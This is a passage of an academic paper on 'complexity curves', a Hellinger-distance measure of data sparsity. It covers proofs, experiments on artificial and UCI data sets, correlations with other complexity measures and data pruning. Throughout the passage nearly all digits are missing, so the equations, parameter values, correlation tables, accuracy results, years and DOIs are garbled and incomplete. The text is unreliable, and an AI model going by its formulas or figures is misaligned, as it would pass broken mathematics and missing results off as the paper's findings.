expected value for any single element is: e[qi]=pi. zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the probability of obtaining any specific vector of frequencies: p ( qn=(q ,q ,...,qk) ) = ( p n q n )( p n q n ) ··· ( pkn qkn ) ( n n ) with ∑k i= qi= . we will consider the simplest case of discrete probability distribution estimated through frequency counts without using the independence assumption. in such case complexity curve is by definition: cc(n)=e[h (p,qn)]. it is obvious that cc(n)= because when n=n we draw all available data. this means that complexity curve always converges. we can ask whether it is possible to say anything about the rate of this convergence. this is the question about the upper bound on the tail of hypergeometric distribution. such bound is given by hoeffding-chvátal inequality (chvátal, ; skala, ). for the univariate case it has the following form: p (∣∣qi−pi∣∣≥δ)≤ e− δ n which generalises to a multivariate case as: p(|qn−p|≥δ)≤ ke − δ n where |qn−p| is the total variation distance. since h (p,qn)≤|qn−p| this guarantees that complexity curve converges at least as fast. now we will consider a special case when n= . in this situation the multivariate hypergeometric distribution is reduced to a simple categorical distribution p. in such case the expected hellinger distance is: e[h (p,q )]= k∑ i= pi √ √√√√ k∑ j= (√ pj− {j=k} ) = k∑ i= pi √ √ −pi+ (√ pi− ) = k∑ i= pi √ − √ pi. this corresponds to the first point of complexity curve and determines its overall steepness. theorem: e[h (p,q )] is maximal for a given k when p is an uniform categorical distribution over k categories, i.e.,: e[h (p,q )]= k∑ i= pi √ − √ pi≤ √ − √ k . zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. proof: we will consider an arbitrary distribution p and the expected hellinger distance e[h (p,q )]. we can modify this distribution by choosing two states l and k occurring with probabilities pl and pk such as that pl −pk is maximal among all pairs of states. we will redistribute the probability mass between the two states creating a new distribution p′. the expected hellinger distance for the distribution p′ will be: e[h (p′,q )]= k∑ i= ,i =k,i =l pi √ − √ pi+a √ − √ a+(pk+pl−a) √ − √ pk+pl−a where a and pk +pl −a are new probabilities of the two states in p′. we will consider a function f (a)=a √ − √ a+(pk+pl−a) √ − √ pk+pl and look for its maxima. ∂f (x) ∂a =− √ − √ pk+pl−a+ √ pk+pl−a √ − √ pk+pl−a + √ − √ a− √ a √ − √ a . the derivative is equal to if and only if a= pk+pl . we can easily see that: f ( )= f (pk+pl)=(pk+pl) √ − √ pk+pl <(pk+pl) √ − √ pk+pl . this means that f (a) reaches its maximum for a= pk+pl . from that, we can conclude that for any distribution p if we produce distribution p′ by redistributing probability mass between two states equally the following holds: e[h (p′,q )]≥e[h (p,q )]. if we repeat such redistribution arbitrary number of times the outcome distribution converges to uniform distribution. this proves that the uniform distribution leads to the maximal expected hellinger distance for a given number of states. theorem: increasing the number of categories by dividing an existing category into two new categories always increases the expected hellinger distance, i.e., k∑ i= pi √ − √ pi≤ k∑ i= ,i =l pi √ − √ pi+a √ − √ a+(pl−a) √ − √ pl−a. proof: without the loss of generality, we can assume that a< . pl. we can subtract terms occurring on both sides of the inequality obtaining: pl √ − √ pl ≤a √ − √ a+(pl−a) √ − √ pl−a pl √ − √ pl ≤a √ − √ a+pl √ − √ pl−a−a √ − √ pl−a pl √ − √ pl+a √ − √ pl−a≤a √ − √ a+pl √ − √ pl−a. now we can see that: pl √ − √ pl ≤pl √ − √ pl−a zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. and a √ − √ pl−a≤a √ − √ a which concludes the proof. from the properties stated by these two theorems, we can gain some intuitions about complexity curves in general. first, by looking at the formula for the uniform distribution e[h (p,q )]= √ − √ k we can see that when k = e[h (p,q )]= and when k →∞ e[h (p,q )]→ . the complexity curve will be less steep if the variables in the data set take multiple values and each value occurs with equal probability. this is consistent with our intuition: we need a larger sample to cover such space and collect information. for a smaller number of distinct values or distributions with mass concentrated mostly in a few points, a smaller sample will be sufficient to represent most of the information in the data set. complexity curve and the performance of an unbiased model to confirm validity of the assumptions behind the complexity curve, we performed experiments with artificial data generated according to known models. for each of the data set, we selected an appropriate classifier which is known to be unbiased with respect to the given model. in this way it was possible to observe if the variance error component is indeed upper bounded by the complexity curve. to train the classifiers, we used the same setting as when calculating the complexity curve: classifiers were trained on random subsets and tested on the whole data set. we fitted the learning curve to the complexity curve by matching first and last points of both curves. we then observed the relation of the two curves in between. the first generated data set followed the logistic model (logit data set). matrix x ( , observations, attributes) contained values drawn from the normal distribution with mean and standard deviation . class vector y was defined as follows: p(y |x)= eβ ′x( +eβ′x ) where β= ( . , . , . , . , . , . , , , , , , ). all attributes were independent and conditionally independent. since y values were determined in a non-deterministic way, there was some noise present –classification error of the logistic regression classifier trained and tested on the full data set was larger than zero. figure presents the complexity curve and the adjusted error of logistic regression for the generated data. after ignoring the noise error component, we can see that the variance error component is indeed upper bounded by the complexity curve. different kind of artificial data represented multidimensional space with parallel stripes in one dimension (stripes data set). it consisted of x matrix with , observations and attributes drawn from an uniform distribution defined on the range [ , ). class values y depended only on the values of one of the attributes: for values lesser than . or greater than . the class was , for other values the class was . this kind of relation can zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure complexity curve and learning curve of the logistic regression on the logit data. figure complexity curve and learning curve of the decision tree on the stripes data. be naturally modelled with a decision tree. all the attributes are again independent and conditionally independent. figure presents complexity curve and the adjusted error of decision tree classifier on the generated data. once again the assumptions of complexity curve methodology are satisfied and the complexity curve indeed an upper bounds the classification error. what would happen if the attribute conditional independence assumption was broken? to answer this question, we generated another type of data modelled after multidimensional zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure complexity curve and learning curve of the decision tree on the chessboard data. chessboard (chessboard data set). x matrix contained , observations and , attributes drawn from an uniform distribution on range[ , ). class vector y had the following values:{ if mi= ⌊xi s ⌋ is even otherwise where s was a grid step in our experiments set to . . there is clearly strong attribute dependence, but since all parts of decision boundary are parallel to one of the attributes this kind of data can be modelled with a decision tree with no bias. figure presents complexity curves and error curves for different dimensionalities of chessboard data. here the classification error becomes larger than indicated by complexity curve. the more dimensions, the more dependencies between attributes violating com- plexity curve assumptions. for a three-dimensional chessboard the classification problem becomes rather hard and the observed error decreases slowly, but the complexity curve remains almost the same as for a two-dimensional case. this shows that the complexity curve is not expected to be a good predictor of classification accuracy in the problems where a lot of high-dimensional attribute dependencies occur for example, in epistatic domains in which the importance of one attribute depends on the values of the other. the results of experiments with controlled artificial data sets are consistent with our theoretical expectations. based on these results, we can introduce a general interpretation of the difference between complexity curve and learning curve: learning curve below the complexity curve is an indication that the algorithm is able to build a good model without sampling the whole domain, limiting the variance error component. on the other hand, the learning curve above the complexity curve is an indication that the algorithm includes complex attributes dependencies in the constructed model, promoting the variance error component. zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure complexity curves for whitened data (dashed lines) and not whitened data (solid lines). ar- eas under the curves are given in the legend. i—set of independent random variables with student’s t distribution. r—one random variable with student’s t distribution repeated times. i_w—whitened i. r_w—whitened r. impact of whitening and ica to evaluate the impact of the proposed preprocessing techniques (whitening and ica— independent component analysis) on complexity curves, we performed experiments with artificial data. in the first experiment, we generated two data sets of observations and with eight attributes distributed according to student’s t distribution with . degrees of freedom. in one data set all attributes were independent, in the other the same attribute was repeated eight times. small gaussian noise was added to both sets. figure shows complexity curves calculated before and after whitening transform. we can see that whitening had no significant effect on the complexity curve of the independent set. in the case of the dependent set, complexity curve calculated after whitening decreases visibly faster and the area under the curve is smaller. this is consistent with our intuitive notion of complexity: a data set with highly correlated or duplicated attributes should be significantly less complex. in the second experiment, two data sets with observations and four attributes were generated. the first data set was generated from the continuous uniform distribution on interval [ , ], the second one from the discrete (categorical) uniform distribution on the same interval. small gaussian noise was added to both sets. figure presents complexity curves for original, whitened and ica-transformed data. among the original data sets, the intuitive notion of complexity is preserved: the area under the complexity curve for categorical data is smaller. the difference disappears for the whitened data but is again visible in the ica-transformed data. zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure complexity curves for whitened data (dashed lines), not whitened data (solid lines) and ica- transformed data (dotted lines). areas under the curves are given in the legend. u—data sampled from uniform distribution. c—data sampled from categorical distribution. u_w—whitened u. c_w—whitened c. u_ica—u_w after ica. c_ica—c_w after ica. these simple experiments are by no means exhaustive but they confirm usefulness of the chosen signal processing techniques (data whitening and the independent component analysis) in the complexity curve analysis. complexity curve variability and outliers the complexity curve is based on the expected hellinger distance and the estimation procedure includes some variance. the natural assumption is that the variability caused by the sample size is greater than the variability resulting from a specific composition of a sample. otherwise, averaging over samples of the same size would not be meaningful. this assumption is already present in standard learning curve methodology where classifier accuracy is plotted against training set size. we expect that the exact variability of the complexity curve will be connected with the presence of outliers in the data set. such influential observations will have a huge impact depending on whether they will be included in a sample or not. to verify whether these intuitions were true, we constructed two new data sets by introducing artificially outliers to wine data set. in wine we modified % of the attribute values by multiplying them by a random number from range (− , ). in wine % of the values were modified in such manner. figure presents conditional complexity curves for all three data sets. wine curve has indeed a higher variance and is less regular than wine curve. wine curve is characterised not only by a higher variance but also by a larger aucc value. this means that adding so much noise increased the overall complexity of the data set significantly. zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure complexity curves for wine and its counterparts with introduced outliers. for the sake of clarity only contours were drawn. the result support our hypothesis that large variability of complexity curve signify an occurrence of highly influential observations in the data set. this makes complexity curve a valuable diagnostic tool for such situations. however, it should be noted that our method is unable to distinguish between important outliers and plain noise. to obtain this kind of insight, one has to employ different methods. comparison with other complexity measures the set of data complexity measures developed by ho & basu ( ) and extended by ho, basu & law ( ) continues to be used in experimental studies to explain performance of various classifiers (diez-pastor et al., ; mantovani et al., ). we decided to compare experimentally complexity curve with those measures. descriptions of the measures used are given in table . according to our hypothesis conditional complexity curve should be robust in the context of class imbalance. to demonstrate this property, we used for the comparison imbalanced data sets used previously in the study by diez-pastor et al. ( ). these data sets come originally from hddt (cieslak et al., ) and keel (alcalá et al., ) repositories. we selected only binary classification problems. the list of data sets with their properties is presented in supplemental information as table s and table s . for each data set, we calculated the area under the complexity curve using the previously described procedure and the values of other data complexity measures using dcol software (orriols-puig, macià & ho, ). pearson’s correlation was then calculated for all the measures. as the t measure seemed to have non-linear characteristics destroying the correlation additional column logt was added to comparison. results are presented in fig. . clearly, aucc is mostly correlated with logt measure. this is to be expected as both measures are concerned with sample size in relation to attribute structure. the zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. table data complexity measures used in experiments. id description f maximum fisher’s discriminant ratio f v directional-vector maximum fisher’s discriminant ratio f overlap of the per-class bounding boxes f maximum individual feature efficiency f collective feature efficiency l minimized sum of the error distance of a linear classifier l training error of a linear classifier l nonlinearity of a linear classifier n fraction of points on the class boundary n ratio of average intra/inter class nearest neighbour distance n leave-one-out error rate of the one-nearest neighbour classifier n nonlinearity of the one-nearest neighbour classifier t fraction of maximum covering spheres t average number of points per dimension figure pearson’s correlations between complexity measures. zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table pearson’s correlations coefficients between classifier auc roc performances and complexity measures. the largest absolute value in each row is printed in bold. aucc logt lda . . logistic regression − . . naive bayes − . . -nn − . . -nn − . . -nn − . . -nn − . . -nn − . . -nn − . . -nn − . . -nn − . . -nn − . . decision tree d = . − . decision tree d = − . . decision tree d = − . . decision tree d = − . . decision tree d = − . . decision tree d = − . . decision tree d = − . . decision tree d = − . . decision tree d = inf − . . difference is that t takes into account only the number of attributes while aucc considers also the shape of distributions of the individual attributes. correlations of aucc with other measures are much lower and it can be assumed that they capture different aspects of data complexity and may be potentially complementary. the next step was to show that information captured by aucc is useful for explaining classifier performance. in order to do so, we trained a number of different classifiers on the benchmark data sets and evaluated their performance using random train-test split with proportion . repeated times. the performance measure used was the area under the roc curve. we selected three linear classifiers—naïve bayes with gaussian kernel, linear discriminant analysis (lda) and logistic regression—and two families of non-linear classifiers of varying complexity: k-nearest neighbour classifier (k-nn) with different values of parameter k and decision tree (cart) with the limit on maximal tree depth. the intuition was as follows: the linear classifiers do not model attributes interdependencies, which is in line with complexity curve assumptions. selected non-linear classifiers on the other hand are—depending on the parametrisation—more prone to variance error, which should be captured by the complexity curve. correlations between aucc, logt , and classifier performance are presented in table . most of the correlations are weak and do not reach statistical significance; however, some general tendencies can be observed. as can be seen, auc roc scores of linear zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. classifiers have very little correlation with aucc and logt . this may be explained by the high-bias and low-variance nature of these classifiers: they are not strongly affected by data scarcity but their performance depends on other factors. this is especially true for the lda classifier, which has the weakest correlation among linear classifiers. in k-nn, classifier complexity depends on k parameter: with low k values, it is more prone to variance error, with a larger k it is prone to bias if the sample size is not large enough (domingos, ). both aucc and logt seem to capture the effect of sample size in the case of large k values well (correlations − . and . for -nn). however, for k= the correlation with aucc is stronger (− . vs . ). depth parameter in decision tree also regulates complexity: the larger the depth the more classifier is prone to variance error and less to bias error. this suggests that aucc should be more strongly correlated with performance of deeper trees. on the other hand, complex decision trees explicitly model attribute interdependencies ignored by complexity curve, which may weaken the correlation. this is observed in the obtained results: for a decision stub (tree of depth ), which is low-variance high-bias classifier, correlation with aucc and logt is very weak. for d = and d = it becomes visibly stronger, and then for larger tree depth it again decreases. it should be noted that with large tree depth, as with small k values in k-nn, aucc has stronger correlation with the classifier performance than logt . a slightly more sophisticated way of applying data complexity measures is an attempt to explain classifier performance relative to some other classification method. in our experiments, lda is a good candidate for reference method since it is simple, has low variance and is not correlated with either aucc or logt . table presents correlations of both measures with classifier performance relative to lda. here we can see that correlations for aucc are generally higher than for logt and reach significance for the majority of classifiers. especially in the case of decision tree, aucc explains relative performance better than logt (correlation . vs − . for d = inf). results of the presented correlation analyses demonstrate the potential of the complexity curve to complement the existing complexity measures in explaining classifier performance. as expected from theoretical considerations, there is a relation between how well aucc correlates with classifier performance and the classifier’s position in the bias–variance spec- trum. it is worth noting that despite the attribute independence assumption the complexity curve method proved useful for explaining performance of complex non-linear classifiers. large p, small n problems there is a special category of machine learning problems in which the number of attributes p is large with respect to the number of samples n, perhaps even order of magnitudes larger. many important biological data sets, most notably data from microarray experiments, fall into this category (johnstone & titterington, ). to test how our complexity measure behaves in such situations, we calculated aucc scores for a few microarray data sets and compared them with auc roc scores of some simple classifiers. classifiers were evaluated as in the previous section. detailed information about the data sets is given in supplemental information as table s . zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. table pearson’s correlations coefficients between classifier auc roc performances relative to lda performance and complexity measures. the largest absolute value in each row is printed in bold. aucc logt lda - logistic regression . − . lda - naive bayes . − . lda - -nn . − . lda - -nn . − . lda - -nn . − . lda - -nn . − . lda - -nn . − . lda - -nn . − . lda - -nn . − . lda - -nn . − . lda - -nn . − . lda - decision tree d = . . lda - decision tree d = . − . lda - decision tree d = . − . lda - decision tree d = . − . lda - decision tree d = . − . lda - decision tree d = . − . lda - decision tree d = . − . lda - decision tree d = . − . lda - decision tree d = inf . − . results of the experiment are presented in table . as expected, with the number of attributes much larger than the number of observations, data is considered by our metric as extremely scarce –values of aucc are in all cases above . . on the other hand, the auc roc classification performance is very varied between data sets with scores approaching or equal to . for leukemia and lymphoma data sets, and scores around . baseline for prostate. this is because, despite the large number of dimensions, the form of the optimal decision function can be very simple, utilising only a few of available dimensions. the complexity curve does not consider the shape of decision boundary at all, and thus does not reflect differences in classification performance. from this analysis we concluded that complexity curve is not a good predictor of classifier performance for data sets containing a large number of redundant attributes, as it does not differentiate between important and unimportant attributes. the logical way to proceed in such case would be to perform some form of feature selection or dimensionality reduction on the original data, and then calculate the complexity curve in the reduced dimensions. applications interpreting complexity curves in order to prove the practical applicability of the proposed methodology, and show how complexity curve plot can be interpreted, we performed experiments with six simple zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table areas under conditional complexity curve (aucc) for microarray data sets along auc roc values for different classifiers. dataset aucc -nn -nn dt d- dt d-inf lda nb lr adenocarcinoma . . . . . . . . breast . . . . . . . . breast . . . . . . . . colon . . . . . . . . leukemia . . . . . . . . lymphoma . . . . . . . . prostate . . . . . . . . notes. k-nn, k-nearest neighbour; dt, cart decision tree; lda, linear discriminant analysis; nb, naïve bayes; lr, logistic regression. data sets from uci machine learning repository (frank & asuncion, ). the sets were chosen only as illustrative examples. the basic properties of the data sets are given in supplemental information as table s . for each data set, we calculated conditional complexity curve. the curves are presented in fig. . learning curves of cart decision tree (dt) were included for comparison. on most of the benchmark data sets we can see that complexity curve upper bounds the dt learning curve. the bound is relatively tight in the case of glass and iris, and looser for breast-cancer-wisconsin and wine data set. a natural conclusion is that a lot of variability contained in this last data set and captured by the hellinger distance is irrelevant to the classification task. the most straightforward explanation would be the presence of unnecessary attributes not correlated with the class which can be ignored altogether. this is consistent with the results of various studies in feature selection. choubey et al. ( ) identified that in glass data – attributes ( – %) are relevant, in iris data attributes ( %), and in breast-cancer-wisconsin – attributes ( – %). similar results were obtained for breast-cancer-wisconsin in other studies, which found that only of the original attributes ( %) contribute to the classification (ratanamahatana & gunopulos, ; liu, motoda & dash, ). dy & brodley ( ) obtained best classification results for wine data set with attributes ( %). on monks- and car, the complexity curve is no longer a proper upper bound on the dt learning curve. this is an indication of models relying heavily on attribute interdependencies to determine the correct class. this is not surprising: both monks- and car are artificial data sets with discrete attributes devised for evaluation of rule-based and tree-based classifiers (thrun et al., ; bohanec & rajkovič, ). classes are defined with logical formulas utilising relations of multiple attributes rather than single values— clearly the attributes are interdependent. in that context, the complexity curve can be treated as a baseline for independent attribute situation and the generalisation curve as diagnostic tool indicating the presence of interdependencies. besides the slope of the complexity curve we can also analyse its variability. we can see that the shape of wine complexity curve is very regular with small variance in each point, while the glass curve displays much higher variance. this mean that the observations in zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. figure conditional complexity curves for six different data sets from uci machine learning repos- itory with areas under complexity curve (aucc) reported: (a) car, aucc: . , (b) monks- , aucc: . , (c) iris, aucc: . , (d) breast-cancer-wisconsin, aucc: . , (e) glass, aucc: . , (f) wine, aucc: . . glass data set are more diverse and some observations (or their combinations) are more important for representing data structure than the other. this short analysis demonstrate how to use complexity curves to compare properties of different data sets. here only decision tree was used as reference classifier. the method can be easily extended to include multiple classifiers and compare their performance. we present such an extended analysis in supplemental information . data pruning with complexity curves the problem of data pruning in the context of machine learning is defined as reducing the size of training sample in order to reduce classifier training time and still achieve zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. satisfactory performance. it becomes extremely important as the data grows and (a) does not fit the memory of a single machine, (b) training times of more complex algorithms become very long. a classic method for performing data pruning is progressive sampling—training the classifier on data samples of increasing size as long as its performance increases. provost, jensen & oates ( ) analysed various schedules for progressive sampling and recommended geometric sampling, in which sample size is multiplied by a specified constant in each iteration, as the reasonable strategy in most cases. geometric sampling uses samples of sizes ain , where n —initial sample size, a—multiplier, i—iteration number. in our method, instead of training classifier on the drawn data sample, we are probing the complexity curve. we are not trying to detect the convergence of classifier accuracy, but just search for a point on the curve corresponding to some reasonably small hellinger distance value, e.g., . . this point designates the smallest data subset which still contains the required amount of information. in this setting, we were not interested in calculating the whole complexity curve but just in finding the minimal data subset, which still contains most of the original information. the search procedure should be as fast as possible, since the goal of the data pruning is to save time spent on training classifiers. to comply with these requirements, we constructed a criterion function of the form f (x)=h (gx,d)−t, where d denotes a probability distribution induced by the whole data set, gx a distribution induced by random subset of size x and t is the desired hellinger distance. we used classic brent method (brent, ) to find a root of the criterion function. in this way, data complexity was calculated only for the points visited by brent’s algorithm. to speed up the procedure even further, we used the standard complexity curve instead of the conditional one and settled for whitening transform as the only preprocessing technique. to verify if this idea is of practical use, we performed an experiment with three bigger data sets from uci repository. their basic properties are given in supplemental information as table s . for all data sets, we performed a stratified fold cross validation experiment. the training part of a split was pruned according to our criterion function with t = . (cc pruning) or using geometric progressive sampling with multiplier a= and initial sample size n = (ps pruning). achieving the same accuracy as with cc pruning was used as a stop criterion for progressive sampling. classifiers were trained on pruned and unpruned data and evaluated on the testing part of each cross validation split. standard error was calculated for the obtained values. we have used machine learning algorithms from the scikit-learn library (pedregosa et al., ) and the rest of the procedure was implemented in python with the help of numpy and scipy libraries. calculations were done on a workstation with core intel r© core tm i - . ghz cpu working under arch gnu/linux. table presents measured times and obtained accuracies. as can be seen, the difference in classification accuracies between pruned and unpruned training data is negligible. cc compression rate differs for the three data sets, which suggests that they are of different complexity: for led data only % is needed to perform successful classification, while zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. table obtained accuracies and training times of different classification algorithms on unpruned and pruned data sets. score corresponds to classifier accuracy, time to classifier training time (including pruning procedure), rate to compression rate. cc corresponds to data pruning with complexity curves, ps to data pruning with progressive sampling. classifier score cc score time cc time ps time ps rate waveform mean cc compression rate: . ± . mean cc compression time: . ± . linear svc . ± . . ± . . ± . . ± . . ± . . ± . gaussian nb . ± . . ± . . ± . . ± . . ± . . ± . rf . ± . . ± . . ± . . ± . . ± . . ± . svc . ± . . ± . . ± . . ± . . ± . . ± . tree . ± . . ± . . ± . . ± . . ± . . ± . logit . ± . . ± . . ± . . ± . . ± . . ± . gbc . ± . . ± . . ± . . ± . . ± . . ± . led mean cc compression rate: . ± . mean cc compression time: . ± . linear svc . ± . . ± . . ± . . ± . . ± . . ± . gaussian nb . ± . . ± . . ± . . ± . . ± . . ± . rf . ± . . ± . . ± . . ± . . ± . . ± . svc . ± . . ± . . ± . . ± . . ± . . ± . tree . ± . . ± . . ± . . ± . . ± . . ± . logit . ± . . ± . . ± . . ± . . ± . . ± . gbc . ± . . ± . . ± . . ± . . ± . . ± . adult mean cc compression rate: . ± . mean cc compression time: . ± . linear svc . ± . . ± . . ± . . ± . . ± . . ± . gaussian nb . ± . . ± . . ± . . ± . . ± . . ± . rf . ± . . ± . . ± . . ± . . ± . . ± . svc . ± . . ± . . ± . . ± . . ± . . ± . tree . ± . . ± . . ± . . ± . . ± . . ± . logit . ± . . ± . . ± . . ± . . ± . . ± . gbc . ± . . ± . . ± . . ± . . ± . . ± . notes. linear svc, linear support vector machine; gaussian nb, naïve bayes with gaussian kernel; rf, random forest cart trees; svc, support vector machine with radial ba- sis function kernel; tree, cart decision tree; logit, logistic regression; gbc, gradient boosting classifier with cart trees. adult data is pruned at %. cc compression rate is rather stable with only small standard deviation, but ps compression rate is characterised with huge variance. in this regard, complexity curve pruning is preferable as a more stable pruning criterion. in all cases when training a classifier on the unpruned data took more than s, we observed huge speed-ups. with the exception of svc on led data set, complexity curve pruning performed better than progressive sampling in such cases. unsurprisingly, real speed-ups were visible only for computationally intensive methods such as support vector machines, random forest and gradient boosted decision trees. for simple methods such as naïve bayes, decision tree or logistic regression, fitting the model on the unpruned data is often faster than applying the pruning strategy. zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. these results present complexity curve pruning as a reasonable model-free alternative to progressive sampling. it is more stable and often less demanding computationally. it does not require additional convergence detection strategy, which is always an important consideration when applying progressive sampling in practice. what is more, complexity curve pruning can also be easily applied in the context of online learning, when the data is being collected on the fly. after appending a batch of new examples to the data set, hellinger distance between the old data set and the extended one can be calculated. if the distance is smaller than the chosen threshold, the process of data collection can be stopped. conclusions in this article, we introduced a measure of data complexity targeted specifically at data sparsity. this distinguish it from other measures focusing mostly on the shape of optimal decision boundary in classification problems. the introduced measure has a form of graphical plot—complexity curve. we showed that it exhibits desirable properties through a series of experiments on both artificially constructed and real-world data sets. we proved that complexity curve capture non-trivial characteristics of the data sets and is useful for explaining the performance of high-variance classifiers. with the conditional complexity curve it was possible to perform a meaningful analysis even with heavily imbalanced data sets. we then demonstrated how complexity curve can be used in practice for data pruning (reducing the size of training set) and that it is a feasible alternative to progressive sampling technique. this result is immediately applicable to all the situations when data overabundance starts to pose a problem. for instance, it is possible to perform a quick exploration study on a pruned data set before fitting computationally expensive models on the whole set. pruning results may also provide a suggestion for choosing proper train-test split ratio or number of folds of cross-validation in the evaluation procedure. we argue that new measures of data characteristics, such as complexity curves, are needed to move away from a relatively static view of classification task to a more dynamic one. it is worth to investigate how various algorithms are affected by certain data manipulations; for example, when new data become available or the underlying distribution shifts. this would facilitate the development of more adaptive and universal algorithms capable of working in a dynamically changing environment. experiments showed that in the presence of large number of redundant attributes not contributing to the classification task complexity curve does not correlate well with classifier performance. it correctly identifies dimensional sparseness of the data, but that is misleading since the actual decision boundary may still be very simple. because of this, as the next step in our research we plan to apply similar probabilistic approach to measure information content of different attributes in a data set and use that knowledge for performing feature selection. graphs analogical to complexity curves and generalisation curves would be valuable tools for understanding characteristics of data sets and classification algorithms related to attribute structure. another limitation our method is the assumption of lack of attributes interdependencies. while the presence of small dependencies does not disrupt the analysis, when strong high zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. dimensional dependencies are present, the complexity curve does not correlate with classifier performance well. this means that it is infeasible to use for some domains; for example, highly epistatic problems in bioinformatics. our long-term goal is to gain a better understanding of the impact of data set structure, both in terms of contained examples and attributes, and use that knowledge to build heterogeneous classification ensembles. we hope that a better control over data sets used in experiments will allow to perform a more systematic study of classifier diversity and consensus methods. additional information and declarations funding the study is cofounded by the european union from resources of the european social fund. project po kl ‘‘information technologies: research and their interdisciplinary applications,’’ agreement uda-pokl. . . - - / - ; polish national science centre (grant numbers: / /t/st / to jz, / /b/st / and / /b/nz / to jz and dp); eu cost bm and bm actions. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: european union: uda-pokl. . . - - / - . polish national science centre: / /t/st / , / /b/st / , / /b/nz / . eu cost: bm , bm . competing interests the authors declare there are no competing interests. author contributions • julian zubek conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • dariusz m. plewczynski conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: associated code is available to download at: https://github.com/zubekj/complexity_curve. (open source python implementation). zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/zubekj/complexity_curve http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references alcalá j, fernández a, luengo j, derrac j, garcía s, sánchez l, herrera f. . keel data-mining software tool: data set repository, integration of algorithms and exper- imental analysis framework. journal of multiple-valued logic and soft computing ( – ): – . bohanec m, rajkovic̆ v. . knowledge acquisition and explanation for multi- attribute decision. in: making, th international workshop expert systems and their applications. brent rp. . algorithms for minimization without derivatives. mineola: dover publications. choubey sk, deogun js, raghavan vv, sever h. . a comparison of feature selection algorithms in the context of rough classifiers. in: proceedings of the fifth ieee international conference on fuzzy systems, vol. . piscataway: ieee, – . chvátal v. . the tail of the hypergeometric distribution. discrete mathematics ( ): – doi . / - x( ) - . cieslak da, hoens tr, chawla nv, kegelmeyer wp. . hellinger distance decision trees are robust and skew-insensitive. data mining and knowledge discovery ( ): – doi . /s - - - . díez-pastor jf, rodríguez jj, garcía-osorio ci, kuncheva li. . diversity techniques improve the performance of the best imbalance learning ensembles. information sciences : – doi . /j.ins. . . . domingos p. . a unified bias-variance decomposition for zero-one and squared loss. in: aaai/iaai. palo alto: aaai press, – . dy jg, brodley ce. . feature selection for unsupervised learning. the journal of machine learning research : – doi . /j.patrec. . . . frank a, asuncion a. . uci machine learning repository. irvine: university of california, irvine, school of information and computer sciences. ho tk. . data complexity analysis: linkage between context and solution in classification. in: lobo ndv, kasparis t, roli f, kwok jt, georgiopoulos m, anagnostopoulos gc, loog m, eds. structural, syntactic, and statistical pattern recognition. lecture notes in computer science, vol. . berlin heidelberg: springer, . ho tk, basu m. . complexity measures of supervised classification problems. ieee transactions on pattern analysis and machine intelligence ( ): – doi . / . . ho tk, basu m, law mhc. . measures of geometrical complexity in classification problems. in: data complexity in pattern recognition. berlin heidelberg: springer, – . zubek and plewczynski ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / - x( ) - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /j.patrec. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. hyvärinen a, oja e. . independent component analysis: algorithms and applica- tions. neural networks ( – ): – doi . /s - ( ) - . johnstone im, titterington dm. . statistical challenges of high-dimensional data. philosophical transactions of the royal society of london a: mathematical, physical and engineering sciences ( ): – doi . /rsta. . . li l, abu-mostafa ys. . data complexity in machine learning. technical report. california institute of technology, pasadena. liu h, motoda h, dash m. . a monotonic measure for optimal feature selection. in: machine learning: 